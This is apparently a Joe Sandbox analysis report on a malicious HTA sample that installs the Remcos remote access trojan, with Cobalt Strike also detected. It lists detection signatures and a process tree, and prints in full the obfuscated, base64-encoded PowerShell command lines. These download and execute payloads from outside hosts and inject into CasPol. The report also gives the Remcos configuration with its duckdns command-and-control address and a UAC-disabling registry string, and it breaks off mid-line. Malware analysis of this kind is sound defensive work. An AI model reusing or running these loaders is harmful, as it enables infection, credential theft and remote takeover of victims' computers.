Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
givenbestupdatedoingformebestthingswithgreatnewsformegive.hta

Overview

General Information

Sample name:givenbestupdatedoingformebestthingswithgreatnewsformegive.hta
Analysis ID:1575616
MD5:f1c8937918d65456c0565dc023e48210
SHA1:487a5ff34609e3aaa41a1d7a92f3705f377ab31b
SHA256:32f32787e8bbc5276d6f9d1d1d8b0f5f762b33df9abf8a820f34d6e702603b99
Tags:htauser-lontze7
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected WebBrowserPassView password recovery tool
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 2584 cmdline: mshta.exe "C:\Users\user\Desktop\givenbestupdatedoingformebestthingswithgreatnewsformegive.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 2888 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6500 cmdline: PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 1848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 1532 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6126.tmp" "c:\Users\user\AppData\Local\Temp\brz1t20s\CSCB0966C08AE0149D5A4EAEA26C81DD572.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 5548 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 7080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnaster MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 6220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 7124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\vgphuoqzklppcrzcpcvdcumi" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 652 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\giuruybtythumfngynhenhzrnto" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 2292 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 6536 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["kelexrmcadmnnccupdated.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B3IX49", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
givenbestupdatedoingformebestthingswithgreatnewsformegive.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.4497247873.0000000000D78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6b6f8:$a1: Remcos restarted by watchdog!
            • 0x6bc70:$a3: %02i:%02i:%02i:%03i
            Click to see the 22 entries
            SourceRuleDescriptionAuthorStrings
            7.2.powershell.exe.6d053d0.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              7.2.powershell.exe.6d053d0.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                7.2.powershell.exe.6d053d0.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  7.2.powershell.exe.6d053d0.1.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aaf8:$a1: Remcos restarted by watchdog!
                  • 0x6b070:$a3: %02i:%02i:%02i:%03i
                  7.2.powershell.exe.6d053d0.1.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64e04:$str_b2: Executing file:
                  • 0x65c3c:$str_b3: GetDirectListeningPort
                  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65780:$str_b7: \update.vbs
                  • 0x64e2c:$str_b9: Downloaded file:
                  • 0x64e18:$str_b10: Downloading file:
                  • 0x64ebc:$str_b12: Failed to upload file:
                  • 0x65c04:$str_b13: StartForward
                  • 0x65c24:$str_b14: StopForward
                  • 0x656d8:$str_b15: fso.DeleteFile "
                  • 0x6566c:$str_b16: On Error Resume Next
                  • 0x65708:$str_b17: fso.DeleteFolder "
                  • 0x64eac:$str_b18: Uploaded file:
                  • 0x64e6c:$str_b19: Unable to delete:
                  • 0x656a0:$str_b20: while fso.FileExists("
                  • 0x65349:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 20 entries
                  SourceRuleDescriptionAuthorStrings
                  amsi32_7080.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi32_7080.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnaster, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxs
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6500, ParentProcessName: 